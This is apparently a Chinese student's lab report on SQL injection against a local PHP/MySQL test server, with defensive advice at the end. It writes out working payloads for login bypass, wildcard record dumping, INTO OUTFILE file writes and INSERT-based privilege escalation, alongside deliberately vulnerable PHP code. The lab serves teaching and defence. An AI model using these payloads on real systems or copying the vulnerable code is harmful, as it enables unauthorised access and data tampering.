网络安全实验4 SQL注入攻击

赞赏码 & 联系方式 & 个人闲话

【实验名称】SQL注入攻击

 

【实验目的】

1.了解SQL注入的基本原理

2.掌握PHP脚本访问MySQL数据库的基本方法

3.掌握程序设计中避免出现SQL注入漏洞的基本方法

 

【实验原理】

1.什么是SQL注入攻击

    所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。

2.为何会有SQL注入攻击

    很多电子商务应用程序都使用数据库来存储信息。不论是产品信息,账目信息还是其它类型的数据,数据库都是Web应用环境中非常重要的环节。SQL命令就是前端Web和后端数据库之间的接口,使得数据可以传递到Web应用程序,也可以从其中发送出来。需要对这些数据进行控制,保证用户只能得到授权给他的信息。可是,很多Web站点都会利用用户输入的参数动态的生成SQL查询要求,攻击者通过在URL、表格域,或者其他的输入域中输入自己的SQL命令,以此改变查询属性,骗过应用程序,从而可以对数据库进行不受限的访问。

    因为SQL查询经常用来进行验证、授权、订购、打印清单等,所以,允许攻击者任意提交SQL查询请求是非常危险的。

3.何时使用SQL注入攻击

当Web应用向后端的数据库提交输入时,就可能遭到SQL注入攻击。可以将SQL命令人为的输入到URL、表格域,或者其他一些动态生成的SQL查询语句的输入参数中,完成上述攻击。因为大多数的Web应用程序都依赖于数据库的海量存储和相互间的逻辑关系(用户权限许可,设置等),所以,每次的查询中都会存在大量的参数。

4. MySQL简介
    SQL是结构化查询语言的简称,它是全球通用的标准数据库查询语言,主要用于关系型数据的操作和管理,如增加记录,删除记录,更改记录,查询记录等,常用命令知识如表4-1-1所示。

                                                                                  表4-1-1  SQL常用命令

命令短语

功能

例句

select

用于查询记录和赋值

select i,j,k from A (i,j,k是表A中仅有的列名)

select i='1' (将i赋值为字符1)

select* from A (含义同第一个例句)

update

用于修改记录

update A set i=2  where i=1

insert

用于添加记录

insert into A values(1, '2',3) (向A表中插入一条记录(i,j,k)对应为(1, '2',3))

delete

用于删除记录

delete A where i=2 (删除A标中i=2的所有表项)

from

用于指定操作的对象名

见 select

where

用于指定查询条件

select *from A,B where A.name=B.name and A.id=B.id

and

逻辑与

1=1 and 2<=2

or

逻辑或

1=1 or 1>2

not

逻辑非

not 1>1

=

相等关系或赋值

见and、or、not

>,>=,<,<=

关系运算符

与相等关系('=')的用法一致。

单引号(“'”)

用于指示字符串型数据

见select

逗号

分割相同的项

见select

*

通配符所有

见select

--

行注释

--这里的语句将不被执行!

/* */

块注释

/* 这里的语句将不被执行! */

 

【实验内容】

一.PHP访问MySQL简单实例

1. 创建隶属test数据库的user表

(1)启动mysql服务

在控制台中输入如下命令启动mysql服务。缺省状态下root用户密码为空。可通过如下命令查看mysql服务是否启动成功。

网络安全实验4 SQL注入攻击_第1张图片

(2)创建user数据库表

在控制台中输入mysql,进入mysql客户端控制台(mysql>)。

网络安全实验4 SQL注入攻击_第2张图片

● 选择工作数据库test(缺省状态下,test数据库已被创建)。

网络安全实验4 SQL注入攻击_第3张图片

● 创建user数据库表

网络安全实验4 SQL注入攻击_第4张图片

● 插入两条数据信息

网络安全实验4 SQL注入攻击_第5张图片

● 查看数据库表

网络安全实验4 SQL注入攻击_第6张图片

 

2. 编写PHP脚本查询user数据库表

编写access.php脚本,内容如下:

SQL查询: $sql_select

"; ?>

从代码中可知,当输入正确的用户名和密码后,就会提示登录成功,否则登录失败。

网络安全实验4 SQL注入攻击_第7张图片

查看本机IP地址,发现为172.16.0.192

 

单击桌面控制面板中“Web浏览器”按钮,当我们在URL地址栏中提交:

http://172.16.0.192/access.php?username=angel&password=mypass

Web页面会提示“登录成功”。

网络安全实验4 SQL注入攻击_第8张图片

写出此时PHP脚本中具体的SQL查询语句: 

SELECT * FROM user WHERE username='angel' AND password='mypass' 
 

3. 实施SQL注入

(1)在URL地址栏中提交:

http://172.16.0.192/access.php?username=angel' or 1=1

注入是否成功?    否     

网络安全实验4 SQL注入攻击_第9张图片

写出此时PHP脚本中具体的SQL查询语句:

SELECT * FROM user WHERE username='angel' or 1=1' AND password=''

 

(2)在URL地址栏中提交

http://172.16.0.192/access.php?username=angel' or '1=1

注入是否成功?    是     

网络安全实验4 SQL注入攻击_第10张图片

写出此时PHP脚本中具体的SQL查询语句: SELECT * FROM user WHERE username='angel' or '1=1' AND password=''                    

通过分析SQL查询语句解释实验现象: 可以看出程序会自动在语句末尾加上',第一种情况形成1=1’语句,显然这是不完整的。而第二种写法在前先加了一个’,形成’1=1’恒等语句。而我们知道逻辑AND运算优先级高于逻辑OR运算,使得先有'1=1' AND password=''得到真,再同username='angel'逻辑or,最终通过检验  

(3)在URL地址栏中提交:

http://172.16.0.192/access.php?username=angel'%23

注入是否成功?    是     

网络安全实验4 SQL注入攻击_第11张图片

写出此时PHP脚本中具体的SQL查询语句:

SELECT * FROM user WHERE username='angel'#' AND password='' 

此处利用了MySQL支持“#”注释格式的特性,在提交的时候会将#后面的语句注释掉。由于编码问题,在多数Web浏览器URL地址栏里直接提交#会变成空,所以这里使用了字符“#”的ASCII码值0x23。

 

(4)Mysql还支持“/*”注释格式,请写出利用“/*”实现注入的URL,以及此时的SQL查询语句。
SQL查询语句:http://172.16.0.192/access.php?username=angel'%2F%2A

网络安全实验4 SQL注入攻击_第12张图片


URL: SELECT * FROM user WHERE username='angel'/*' AND password='' 

 

(5)步骤(2)通过向username注入逻辑or运算,在只需知晓用户名的情况下便可成功登录。下面请设计单独向password注入逻辑运算(可多个),要求在只需知晓用户名的情况下实现登录:
 SQL查询语句: http://172.16.0.192/access.php?username=&password=' or 1=1 and username='angel 

网络安全实验4 SQL注入攻击_第13张图片

URL: SELECT * FROM user WHERE username='' AND password='' or 1=1 and username='angel' 

 

(6)下面请设计SQL查询语句,要求在不需要知晓用户名和密码的情况下实现登录。

提示:通过猜测用户ID字段名称与用户序列号,结合逻辑运算,向password进行注入。
SQL查询语句: http://172.16.0.192/access.php?username=&password=' or 1=1 and userid='1 

URL: SELECT * FROM user WHERE username='' AND password='' or 1=1 and userid='1'      

 

二.搜索引擎注入

值得注意的是,Internet上有许多的PHP程序搜索引擎是存在问题的,也就是提交特殊字符就可以显示所有记录,包括不符合条件的。
1. 创建隶属test数据库的file表

(1)创建file数据库表

file数据库表结构如下:

网络安全实验4 SQL注入攻击_第14张图片

(2)插入四条数据信息

网络安全实验4 SQL注入攻击_第15张图片

title

author

summary

honeypot paper

honeypot.net

honeypot and honeynet

snort paper

snort.net

snort intrusion detection

snort based network

ppi

another snort paper

iptables+snort

no name

intelligence ids

 

2. 编写HTML页面

通过HTML页面提交表单给服务器端PHP脚本,由PHP根据表单索引关键字对MySQL数据库进行查询,最后将查询结果返回给HTML页面。HTML页面代码如下:



文档搜索引擎

关键字:

 

网络安全实验4 SQL注入攻击_第16张图片

 

3. 编写PHP脚本查询file数据库表




  搜索结果


文档搜索引擎

"; echo "文档搜索时间: "; echo date("H:i, jS F

"); echo "搜索结果:"; $servername = "localhost"; $dbusername = "root"; $dbpassword = ""; $dbname = "test"; $tablename = "files"; $result = mysql_connect( $servername, $dbusername,$dbpassword); if( !$result ) { echo ("连接mysql服务器失败"); exit(); } if( !empty($key) ) { $sql_select = "SELECT * FROM file WHERE title LIKE '%$key%' "; $result = mysql_db_query( $dbname, $sql_select ); if( empty($result) ) { echo("mysql_db_query error"); exit(); } $total = mysql_num_rows($result); if( $total <= 0 ) { echo ("

The $key was not found in all the record

"); } else { while( $file = mysql_fetch_array($result) ) { echo("

  • ".htmlspecialchars($file[title])."

    "); echo( "摘要:".htmlspecialchars($file[summary]) ); } } } else { echo("请输入查询关键字.

    "); } exit(); ?>

  • 从代码中可知,search.php会按search.htm提交的关键字对file数据库表进行模糊查询,并最终将查询结果显示在HTML页面中。

    输入关键字“snort”进行 搜索,搜索结果中含有多少条记录? 3条 。记录中是否包含与snort关键字无关的项  无  

    网络安全实验4 SQL注入攻击_第17张图片

     

    写出此时PHP脚本中具体的SQL查询语句: SELECT * FROM file WHERE title LIKE '%snort%'  
     

    4. SQL注入

    (1)这里我们利用PHP脚本没有对关键字变量进行检查的漏洞进入SQL注入。输入关键字“%”,进行搜索,搜索结果中含有多少条记录? 4条  。记录中是否包含与snort关键字无关的项 包含honeypot paper 

    网络安全实验4 SQL注入攻击_第18张图片

    写出此时PHP脚本中具体的SQL查询语句:  SELECT * FROM file WHERE title LIKE '%%%'  

    解释SQL查询语句含义: 从title列中模糊查询全部记录   

     

    (2)输入关键字“_’ORDER BY fileid#”

    「说明」 “_”字符表示单字符通配,n个“_”字符则表示n字符通配。“ORDER BY fileid”表示按特定顺序进行SQL查询。若fileid为整型字段,则按整数大小(由小到大)顺序进行查询;若fileid为字符数组类型字段,则按字符ASCII码(由前到后)顺序进行查询。

    网络安全实验4 SQL注入攻击_第19张图片

    写出此时PHP脚本中具体的SQL查询语句: SELECT * FROM file WHERE title LIKE '%_’ORDER BY fileid#%'    

    解释SQL查询语句含义: 按照fileid从小到大排列,模糊查询记录 

     

    三.注入实现导出文件

    本实验步骤仅为说明由于SQL注入而给服务器系统带来一定程度上的危害。

    在步骤一中,我们使用用户名,在无需知晓用户密码的情况下,通过SQL注入实现了登录。作为进一步操作,我们可以通过SQL注入来向服务器硬盘中写入大量无用的文件,而这是利用了MySQL的“INTO OUTFILE”命令,其查询方法如下:

    SELECT * FROM user WHERE cond into outfile '/etc/temp.txt';

    上述SQL查询语句会将user数据库表中,满足cond条件的记录以INTO OUTFILE标准格式导出到/etc/temp.txt文件中。而信息能够被成功导出到/etc/temp.txt中的条件是目标目录有可写的权限和目标文件不存在。

    网络安全实验4 SQL注入攻击_第20张图片

    基于步骤一,写出能够实现(SQL注入)上述功能的URL: http://172.16.0.192/access.php?username=' or 1=1 into outfile '/etc/temp.txt'%23 

    写出此时PHP脚本中具体的SQL查询语句: SELECT * FROM user WHERE username='' or 1=1 into outfile '/etc/temp.txt'#' AND password='' 

    看到temp.txt中的结果:

    网络安全实验4 SQL注入攻击_第21张图片

     

     

    四.通过注入提升用户权限

    如果大家认为SQL注入仅仅适用于SELECT语句就大错特错了,其实还有两个危害更大的操作,那就是INSERT和UPDATE语句。

    (1)创建隶属test数据库的register表

    切换至/opt/ExpNIC/HostSec-Lab/Projects/step4/目录,执行脚本create_table_register创建register数据库表。

    网络安全实验4 SQL注入攻击_第22张图片

    网络安全实验4 SQL注入攻击_第23张图片

    写出数据表包含的字段名称: Field、Type、Null、Key、Default、Extra

     

    (2)注册用户
    将/opt/ExpNIC/HostSec-Lab/Projects/step4/目录中的register.htm和register.php文件拷贝至/var/www/html目录下。

    在Web浏览器URL地址栏中访问register.htm页面。

    填写“用户名”、“用户口令”和“个人主页”信息,单击“注册”按钮,进行注册。

    网络安全实验4 SQL注入攻击_第24张图片

    网络安全实验4 SQL注入攻击_第25张图片

    注册用户级别(userlevel)  3  

     

    (3)SQL注入提升注册用户权限

    返回到register.htm页面,按如下方法填写“个人主页”信息。

    http://lixiaojun.com’,’1)#

    网络安全实验4 SQL注入攻击_第26张图片

    网络安全实验4 SQL注入攻击_第27张图片

    单击“注册”按钮,用户注册级别  1  

    写出此时PHP脚本中具体的SQL查询语句: INSERT INTO register VALUES(0,'lixiaojun','123','http://lixiaojun.com’,’1)#',3)  

     

    思考问题 

    1.思考程序设计中有效避免SQL注入的方法(不限于本实验中提及的)?

    (1)输入验证

    检查用户输入的合法性,确信输入的内容只包含合法的数据。

    (2)错误消息处理

    防范SQL注入,还要避免出现一些详细的错误消息,因为黑客们可以利用这些消息。要使用一种标准的输入确认机制来验证所有的输入数据的长度、类型、语句、企业规则等。

    (3)加密处理

    将用户登录名称、密码等数据加密保存。加密用户输入的数据,然后再将它与数据库中保存的数据比较,用户输入的数据不再对数据库有任何特殊的意义,从而也就防止了攻击者注入SQL命令。

    (4)存储过程来执行所有的查询

    SQL参数的传递方式将防止攻击者利用单引号和连字符实施攻击。

    (5)使用专业的漏洞扫描工具

    一个完善的漏洞扫描程序不同于网络扫描程序,它专门查找网站上的SQL注入式漏洞。最新的漏洞扫描程序可以查找最新发现的漏洞。

    (6)确保数据库安全

    锁定数据库的安全,只给访问数据库的web应用功能所需的最低的权限,撤销不必要的公共许可,使用强大的加密技术来保护敏感数据并维护审查跟踪。

    (7)安全审评

    在部署应用系统前,始终要做安全审评。建立一个正式的安全过程,并且每次做更新时,要对所有的编码做审评。

     

    2.SQL注入漏洞产生的原因是什么?

    但凡有SQL注入漏洞的程序,都是因为程序要接受来自客户端用户输入的变量或URL传递的参数,并且这个变量或参数是组成SQL语句的一部分,

    对于用户输入的内容或传递的参数,应该要时刻保持警惕,这是安全领域里的外部数据不可信任的原则,SQL注入漏洞的产生大多数都是因为开发者开发过程中不注意规范书写sql语句和对特殊字符进行过滤,违反了这个原则而导致的。

     

    【小结或讨论】

    这次的SQL注入其实在之前的学习中就有接触过,在CTF比赛和软件安全课程上都有过学习,所以这次实验总的来说还是比较顺利的,内容也较为容易理解。

    实验从or '1=1这个最经典的注入方式入手,很直接鲜明的给出了SQL注入的案例,一下子就让我们也知道了SQL注入是什么、SQL注入漏洞在哪、SQL注入想干什么、SQL注入该如何去操作。而对于实验中的or 1=1注入,很明显这不能形成一个完整的闭合语句,而通过or '1=1,先开始了一个新的语句,再结合自动补充的’,就能形成一个恒成立的等式‘1=1’,从而跳过验证。

    SQL注入的方法有很多,很重要的一个就是利用的就是AND和OR的运算规则,从而造成后台脚本逻辑性错误,我们的实验也是这样做的。除此之外猜解表名、列名,绕过一些防注入的方法比如双空格等等,有很多值得进一步学习探究的地方。SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况,特别现在大小网站多少都会有防注入的限制措施,会对输入进行过滤和审查。能不能根据具体情况进行分析,构造巧妙的SQL语句,这才是SQL注入最为精华的部分。

    实验还演示了利用SQL提权的操作,证明注入不仅适用于select。SQL注入非常注重技巧,合理的猜测往往也是解题最不可或缺的一部分,所以要想学好SQL注入还有很多的空间值得我们自己去慢慢发掘。

    你可能感兴趣的:(网络安全实验)